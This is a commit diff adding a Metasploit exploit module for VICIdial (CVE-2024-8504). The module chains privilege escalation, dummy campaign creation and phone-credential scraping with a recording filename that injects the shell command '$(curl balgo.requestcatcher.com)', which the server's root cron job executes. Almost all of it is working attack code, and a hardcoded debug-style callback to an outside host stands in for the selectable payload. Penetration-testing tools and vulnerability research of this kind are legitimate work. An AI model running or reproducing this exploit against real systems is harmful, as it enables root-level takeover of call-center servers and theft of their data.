Add VICIdial Authenticated RCE module (CVE-2024-8504)

Chocapikk · Chocapikk · commit 17838e66cdeb · 2024-09-12T01:37:44.000+02:00
diff --git a/modules/exploits/unix/webapp/vicidial_agent_authenticated_rce.rb b/modules/exploits/unix/webapp/vicidial_agent_authenticated_rce.rb
@@ -0,0 +1,391 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VICIdial Authenticated Remote Code Execution',
+        'Description' => %q{
+          An attacker with authenticated access to VICIdial as an "agent"
+          can execute arbitrary shell commands as the "root" user. This
+          attack can be chained with CVE-2024-8503 to execute arbitrary
+          shell commands starting from an unauthenticated perspective.
+        },
+        'Author' => [
+          'Valentin Lobstein', # Metasploit Module
+          'Jaggar Henry of KoreLogic, Inc.' # Vulnerability Discovery
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-8504'],
+          ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt']
+        ],
+        'DisclosureDate' => '2024-09-10',
+        'Platform' => %w[unix linux],
+        'Arch' => %w[ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'PHP Command Shell', {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Payload' => {
+          'BadChars' => '/'
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'Administrator username']),
+      OptString.new('PASSWORD', [true, 'Administrator password']),
+    ])
+  end
+
+  def exploit
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    session = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
+    session.connect
+
+    # Authenticate using administrator credentials
+    credentials = "#{username}:#{password}"
+    credentials_base64 = Rex::Text.encode_base64(credentials)
+    auth_header = "Basic #{credentials_base64}"
+
+    target_uri = normalize_uri(datastore['TARGETURI'], 'vicidial', 'admin.php')
+    request_params = { 'ADD' => '3', 'user' => username }
+    request_headers = { 'Authorization' => auth_header }
+
+    res = send_request_cgi({
+      'uri' => target_uri,
+      'method' => 'GET',
+      'vars_get' => request_params,
+      'headers' => request_headers,
+      'keep_cookies' => true
+    })
+
+    unless res&.code == 200
+      print_error('Failed to authenticate with credentials. Maybe hashing is enabled?')
+      return
+    end
+
+    print_good("Authenticated successfully as user '#{username}'")
+
+    # Update user settings to increase privileges beyond default administrator
+    user_settings_body = {
+      'ADD' => '4A', 'custom_fields_modify' => '0', 'user' => username, 'DB' => '0', 'pass' => password,
+      'force_change_password' => 'N', 'full_name' => 'KoreLogic', 'user_level' => '9',
+      'user_group' => 'ADMIN', 'phone_login' => 'KoreLogic', 'phone_pass' => 'KoreLogic',
+      'active' => 'Y', 'voicemail_id' => '', 'email' => '', 'mobile_number' => '', 'user_code' => '',
+      'user_location' => '', 'user_group_two' => '', 'territory' => '', 'user_nickname' => '',
+      'user_new_lead_limit' => '-1', 'agent_choose_ingroups' => '1', 'agent_choose_blended' => '1',
+      'hotkeys_active' => '0', 'scheduled_callbacks' => '1', 'agentonly_callbacks' => '0',
+      'next_dial_my_callbacks' => 'NOT_ACTIVE', 'agentcall_manual' => '0', 'manual_dial_filter' => 'DISABLED',
+      'agentcall_email' => '0', 'agentcall_chat' => '0', 'vicidial_recording' => '1', 'vicidial_transfers' => '1',
+      'closer_default_blended' => '0', 'user_choose_language' => '0', 'selected_language' => 'default+English',
+      'vicidial_recording_override' => 'DISABLED', 'mute_recordings' => 'DISABLED',
+      'alter_custdata_override' => 'NOT_ACTIVE', 'alter_custphone_override' => 'NOT_ACTIVE',
+      'agent_shift_enforcement_override' => 'ALL', 'agent_call_log_view_override' => 'Y',
+      'hide_call_log_info' => 'Y', 'agent_lead_search' => 'NOT_ACTIVE', 'lead_filter_id' => 'NONE',
+      'user_hide_realtime' => '0', 'allow_alerts' => '0', 'preset_contact_search' => 'NOT_ACTIVE',
+      'max_inbound_calls' => '0', 'max_inbound_filter_enabled' => '0', 'max_inbound_filter_min_sec' => '-1',
+      'inbound_credits' => '-1', 'max_hopper_calls' => '0', 'max_hopper_calls_hour' => '0',
+      'wrapup_seconds_override' => '-1', 'ready_max_logout' => '-1', 'status_group_id' => '',
+      'campaign_js_rank_select' => '', 'campaign_js_grade_select' => '', 'ingroup_js_rank_select' => '',
+      'ingroup_js_grade_select' => '', 'RANK_AGENTDIRECT' => '0', 'GRADE_AGENTDIRECT' => '10',
+      'LIMIT_AGENTDIRECT' => '-1', 'WEB_AGENTDIRECT' => '', 'RANK_AGENTDIRECT_CHAT' => '0',
+      'GRADE_AGENTDIRECT_CHAT' => '10', 'LIMIT_AGENTDIRECT_CHAT' => '-1', 'WEB_AGENTDIRECT_CHAT' => '',
+      'custom_one' => '', 'custom_two' => '', 'custom_three' => '', 'custom_four' => '', 'custom_five' => '',
+      'qc_enabled' => '0', 'qc_user_level' => '1', 'qc_pass' => '0', 'qc_finish' => '0', 'qc_commit' => '0',
+      'hci_enabled' => '0', 'realtime_block_user_info' => '0', 'admin_hide_lead_data' => '0',
+      'admin_hide_phone_data' => '0', 'ignore_group_on_search' => '0', 'user_admin_redirect_url' => '',
+      'view_reports' => '1', 'access_recordings' => '0', 'alter_agent_interface_options' => '1',
+      'modify_users' => '1', 'change_agent_campaign' => '1', 'delete_users' => '1', 'modify_usergroups' => '1',
+      'delete_user_groups' => '1', 'modify_lists' => '1', 'delete_lists' => '1', 'load_leads' => '1',
+      'modify_leads' => '1', 'export_gdpr_leads' => '0', 'download_lists' => '1', 'export_reports' => '1',
+      'delete_from_dnc' => '1', 'modify_campaigns' => '1', 'campaign_detail' => '1', 'modify_dial_prefix' => '1',
+      'delete_campaigns' => '1', 'modify_ingroups' => '1', 'delete_ingroups' => '1', 'modify_inbound_dids' => '1',
+      'delete_inbound_dids' => '1', 'modify_custom_dialplans' => '1', 'modify_remoteagents' => '1',
+      'delete_remote_agents' => '1', 'modify_scripts' => '1', 'delete_scripts' => '1', 'modify_filters' => '1',
+      'delete_filters' => '1', 'ast_admin_access' => '1', 'ast_delete_phones' => '1', 'modify_call_times' => '1',
+      'delete_call_times' => '1', 'modify_servers' => '1', 'modify_shifts' => '1', 'modify_phones' => '1',
+      'modify_carriers' => '1', 'modify_email_accounts' => '0', 'modify_labels' => '1', 'modify_colors' => '1',
+      'modify_languages' => '0', 'modify_statuses' => '1', 'modify_voicemail' => '1', 'modify_audiostore' => '1',
+      'modify_moh' => '1', 'modify_tts' => '1', 'modify_contacts' => '1', 'callcard_admin' => '1',
+      'modify_auto_reports' => '0', 'add_timeclock_log' => '1', 'modify_timeclock_log' => '1',
+      'delete_timeclock_log' => '1', 'manager_shift_enforcement_override' => '1', 'pause_code_approval' => '1',
+      'admin_cf_show_hidden' => '0', 'modify_ip_lists' => '0', 'ignore_ip_list' => '0',
+      'two_factor_override' => 'NOT_ACTIVE', 'vdc_agent_api_access' => '1', 'api_list_restrict' => '0',
+      'api_allowed_functions%5B%5D' => 'ALL_FUNCTIONS', 'api_only_user' => '0', 'modify_same_user_level' => '1',
+      'download_invalid_files' => '1', 'alter_admin_interface_options' => '1', 'SUBMIT' => 'SUBMIT'
+    }
+
+    send_request_cgi({
+      'uri' => target_uri,
+      'method' => 'POST',
+      'headers' => request_headers,
+      'vars_post' => user_settings_body,
+      'keep_cookies' => true
+    })
+
+    print_good('Updated user settings to increase privileges')
+
+    # Update system settings without clobbering existing configuration
+    res = send_request_cgi({
+      'uri' => target_uri,
+      'method' => 'GET',
+      'headers' => request_headers,
+      'vars_get' => { 'ADD' => Rex::Text.rand_text_numeric(10, 15) },
+      'keep_cookies' => true
+    })
+    unless res
+      print_error('Failed to fetch system settings')
+      return
+    end
+
+    system_settings_body = {}
+    res.get_html_document.css('input').each do |input_tag|
+      system_settings_body[input_tag['name']] = input_tag['value']
+    end
+
+    res.get_html_document.css('select').each do |select_tag|
+      selected_tag = select_tag.at_css('option[selected]')
+      next unless selected_tag
+
+      system_settings_body[select_tag['name']] = selected_tag.text
+    end
+
+    system_settings_body['outbound_autodial_active'] = '0'
+
+    send_request_cgi({
+      'uri' => target_uri,
+      'method' => 'POST',
+      'headers' => request_headers,
+      'vars_post' => system_settings_body,
+      'keep_cookies' => true
+    })
+
+    print_good('Updated system settings')
+
+    # Create dummy campaign
+    campaign_settings_body = {
+      'ADD' => '21', 'park_ext' => '', 'campaign_id' => '313373', 'campaign_name' => 'korelogic_campaign',
+      'campaign_description' => '', 'user_group' => '---ALL---', 'active' => 'Y', 'park_file_name' => '',
+      'web_form_address' => '', 'allow_closers' => 'Y', 'hopper_level' => '1', 'auto_dial_level' => '0',
+      'next_agent_call' => 'random', 'local_call_time' => '12pm-5pm', 'voicemail_ext' => '', 'script_id' => '',
+      'get_call_launch' => 'NONE', 'SUBMIT' => 'SUBMIT'
+    }
+
+    send_request_cgi({
+      'uri' => target_uri,
+      'method' => 'POST',
+      'headers' => request_headers,
+      'vars_post' => campaign_settings_body,
+      'keep_cookies' => true
+    })
+
+    print_good('Created dummy campaign "korelogic_campaign"')
+
+    # Update dummy campaign
+    update_campaign_body = {
+      'ADD' => '41', 'campaign_id' => '313373', 'old_campaign_allow_inbound' => 'Y',
+      'campaign_name' => 'korelogic_campaign', 'active' => 'Y', 'dial_status' => '', 'lead_order' => 'DOWN',
+      'list_order_mix' => 'DISABLED', 'lead_filter_id' => 'NONE', 'no_hopper_leads_logins' => 'Y',
+      'hopper_level' => '1', 'reset_hopper' => 'N', 'dial_method' => 'RATIO', 'auto_dial_level' => '1',
+      'adaptive_intensity' => '0', 'SUBMIT' => 'SUBMIT', 'form_end' => 'END'
+    }
+
+    send_request_cgi({
+      'uri' => target_uri,
+      'method' => 'POST',
+      'headers' => request_headers,
+      'vars_post' => update_campaign_body,
+      'keep_cookies' => true
+    })
+
+    print_good('Updated dummy campaign settings')
+
+    # Create dummy list
+    list_settings_body = {
+      'ADD' => '211', 'list_id' => '313374', 'list_name' => 'korelogic_list', 'list_description' => '',
+      'campaign_id' => '313373', 'active' => 'Y', 'SUBMIT' => 'SUBMIT'
+    }
+
+    send_request_cgi({
+      'uri' => target_uri,
+      'method' => 'POST',
+      'headers' => request_headers,
+      'vars_post' => list_settings_body,
+      'keep_cookies' => true
+    })
+
+    print_good('Created dummy list for campaign')
+
+    # Fetch credentials for a phone login
+    res = send_request_cgi({
+      'uri' => target_uri,
+      'method' => 'GET',
+      'headers' => request_headers,
+      'vars_get' => { 'ADD' => '10000000000' },
+      'keep_cookies' => true
+    })
+
+    unless res
+      print_error('Failed to fetch phone credentials')
+      return
+    end
+
+    phone_uri_path = res.get_html_document.at_css('a:contains("MODIFY")')['href']
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], phone_uri_path),
+      'method' => 'GET',
+      'headers' => request_headers,
+      'keep_cookies' => true
+    })
+
+    unless res
+      print_error('Failed to fetch phone credentials')
+      return
+    end
+
+    phone_extension = res.get_html_document.at_css('input[name="extension"]')['value']
+    phone_password = res.get_html_document.at_css('input[name="pass"]')['value']
+    recording_extension = res.get_html_document.at_css('input[name="recording_exten"]')['value']
+
+    print_good("Found phone credentials: #{phone_extension}:#{phone_password}")
+
+    # Make POST request to /agc/vdc_db_query.php to retrieve hidden input fields
+    # (this is the fixed bug, dynamic field names need to be retrieved)
+    vdc_db_query_body = {
+      'user' => username,
+      'pass' => password,
+      'ACTION' => 'LogiNCamPaigns',
+      'format' => 'html'
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vdc_db_query.php'),
+      'method' => 'POST',
+      'vars_post' => vdc_db_query_body,
+      'keep_cookies' => true
+    })
+
+    unless res
+      print_error('Failed to retrieve hidden input fields')
+      return
+    end
+
+    mgr_login_name = res.get_html_document.at_css('input[name^="MGR_login"]')['name']
+    mgr_pass_name = res.get_html_document.at_css('input[name^="MGR_pass"]')['name']
+
+    print_good("Retrieved dynamic field names: #{mgr_login_name}, #{mgr_pass_name}")
+
+    # Authenticate to agent portal with phone credentials
+    manager_login_body = {
+      'DB' => '0', 'JS_browser_height' => '1313', 'JS_browser_width' => '2560', 'phone_login' => phone_extension,
+      'phone_pass' => phone_password, 'LOGINvarONE' => '', 'LOGINvarTWO' => '', 'LOGINvarTHREE' => '', 'LOGINvarFOUR' => '',
+      'LOGINvarFIVE' => '', 'hide_relogin_fields' => '', 'VD_login' => username, 'VD_pass' => password,
+      'MGR_override' => '1', 'relogin' => 'YES',
+      mgr_login_name => username, mgr_pass_name => password, 'SUBMIT' => 'SUBMIT'
+    }
+
+    send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'),
+      'method' => 'POST',
+      'headers' => request_headers,
+      'vars_post' => manager_login_body,
+      'keep_cookies' => true
+    })
+
+    print_good('Entered "manager" credentials to override shift enforcement')
+
+    agent_login_body = {
+      'DB' => '0', 'JS_browser_height' => '1313', 'JS_browser_width' => '2560', 'admin_test' => '', 'LOGINvarONE' => '',
+      'LOGINvarTWO' => '', 'LOGINvarTHREE' => '', 'LOGINvarFOUR' => '', 'LOGINvarFIVE' => '', 'phone_login' => phone_extension,
+      'phone_pass' => phone_password, 'VD_login' => username, 'VD_pass' => password, 'VD_campaign' => '313373'
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'vicidial.php'),
+      'method' => 'POST',
+      'headers' => request_headers,
+      'vars_post' => agent_login_body,
+      'keep_cookies' => true
+    })
+
+    print_good('Authenticated as agent using phone credentials')
+
+    # Insert malicious recording
+    session_name = res.get_html_document.at_css("script:contains('var session_name =')").text.match(/var session_name = '([a-zA-Z0-9_]+)';/)[1]
+    session_id = res.get_html_document.at_css("script:contains('var session_id =')").text.match(/var session_id = '([0-9]+)';/)[1]
+
+    # hex_encoded_payload = "curl balno.requestcatcher.com".unpack('H*').first
+    # formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join
+    command = 'curl balgo.requestcatcher.com'
+    print_status("Payload: #{command}")
+    malicious_filename = "3133731337$(#{command})"
+
+    record1_body = {
+      'server_ip' => datastore['RHOSTS'], 'session_name' => session_name, 'user' => username, 'pass' => password,
+      'ACTION' => 'MonitorConf', 'format' => 'text', 'channel' => "Local/#{recording_extension}@default", 'filename' => malicious_filename,
+      'exten' => recording_extension, 'ext_context' => 'default', 'lead_id' => '', 'ext_priority' => '1', 'FROMvdc' => 'YES',
+      'uniqueid' => '', 'FROMapi' => ''
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'manager_send.php'),
+      'method' => 'POST',
+      'headers' => request_headers,
+      'vars_post' => record1_body,
+      'keep_cookies' => true
+    })
+
+    recording_id = res.body.match(/RecorDing_ID: ([0-9]+)/)[1]
+
+    # Stop malicious recording to prevent file size from growing
+    record2_body = {
+      'server_ip' => datastore['RHOSTS'], 'session_name' => session_name, 'user' => username,
+      'pass' => password, 'ACTION' => 'StopMonitorConf', 'format' => 'text', 'channel' => "Local/#{recording_extension}@default",
+      'filename' => "ID:#{recording_id}", 'exten' => session_id, 'ext_context' => 'default', 'lead_id' => '', 'ext_priority' => '1',
+      'FROMvdc' => 'YES', 'uniqueid' => '', 'FROMapi' => ''
+    }
+
+    send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'agc', 'conf_exten_check.php'),
+      'method' => 'POST',
+      'headers' => request_headers,
+      'vars_post' => record2_body,
+      'keep_cookies' => true
+    })
+
+    print_good('Stopped malicious recording to prevent file size from growing')
+
+    # Wait for 2 minutes to allow the cron job to execute the payload
+    print_status('Waiting for 2 minutes to allow the cron job to execute the payload...')
+    Rex.sleep(120)
+  end
+end
